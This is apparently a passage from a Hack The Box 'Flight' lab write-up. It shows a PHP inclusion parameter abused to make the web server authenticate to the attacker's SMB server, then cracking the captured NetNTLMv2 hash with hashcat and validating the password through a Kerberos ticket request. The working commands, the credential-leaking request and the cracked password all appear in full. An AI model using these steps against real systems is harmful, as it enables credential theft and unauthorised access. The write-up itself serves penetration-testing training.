PHP Inclusion Over SMB
inclusion vulnerability identified earlier in the virtual host, school.flight.htb,was initially suspected due to the misuse of the php include function. It turns out that it was using the PHP get_file_contents function for inclusion. While this alone mitigates PHP code execution, there is another aspect of PHP when configured and hosted from a Windows host
Another noteworthy feature of PHP when running on a Windows host is its capability to fetch remote resources over SMB. While this convenience is beneficial, a potential drawback arises as it triggers authentication, leading to the inadvertent disclosure of credentials during the process.
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ simplesmb . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedSetting up an arbitrary SMB server on Kali
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ curl http://school.flight.htb/index.php?view=//10.10.16.8/blahblahSending in a request with the Kali’s SMB server in the view parameter
This should invoke the authentication
The web application has indeed authenticated and connected to the Kali SMB server
It would appear that the svc_apache is the service account behind the web server
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ hashcat --show svc_apache.hash
5600 | NetNTLMv2 | Network ProtocolIn most cases, cracking an NetNTLMv2 hash is very difficult if not impossible
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ hashcat -a 0 -m 5600 svc_apache.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d1cd6f05c2c4263d97741bc6f5a5c8be:010100000000000080ded004642cda0163950dff043f3299000000000100100052005400680068006c004a00650041000300100052005400680068006c004a00650041000200100062004d005a00760064004300760077000400100062004d005a00760064004300760077000700080080ded004642cda0106000400020000000800300030000000000000000000000000300000f377ff619a9971b9151148f0afd73f23298106c88f89e83fb08af98d19b03ad30a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:S@Ss!K@*t13
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d1cd6f05c2c4263...000000
Time.Started.....: Mon Dec 11 19:59:23 2023 (5 secs)
Time.Estimated...: Mon Dec 11 19:59:28 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2400.8 kH/s (0.78ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10665984/14344386 (74.36%)
Rejected.........: 0/10665984 (0.00%)
Restore.Point....: 10662912/14344386 (74.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: S@m@nth@!? -> Ryanpotts
Hardware.Mon.#1..: Util: 58%
Stopped: Mon Dec 11 19:59:29 2023However, hashcat cracked the password hash.
The cracked password for the svc_apache account is S@Ss!K@*t13
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ impacket-getTGT flight.htb/svc_apache@g0.flight.htb -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: S@Ss!K@*t13
[*] Saving ticket in svc_apache@g0.flight.htb.ccacheValidated against the target KDC
TGT saved for the svc_apache account